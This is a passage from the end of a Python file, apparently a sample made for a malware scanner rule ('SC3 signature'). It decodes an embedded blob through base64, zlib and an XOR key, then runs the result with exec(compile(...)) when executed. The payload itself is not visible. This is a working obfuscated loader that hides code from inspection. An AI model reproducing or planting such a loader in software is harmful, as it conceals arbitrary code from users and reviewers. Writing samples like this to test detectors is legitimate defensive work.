+dcvU+ehEtFAXdwL9aPJLC4dNeQ6jagHlc1HV9yeGyw8xiS6I4kAHF4p5kGYy/WA9JtCf9+TyZ39z4+O7r9//w1jyTOM"
_K = bytes.fromhex("248c677b802d5cf4b442b1ff")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
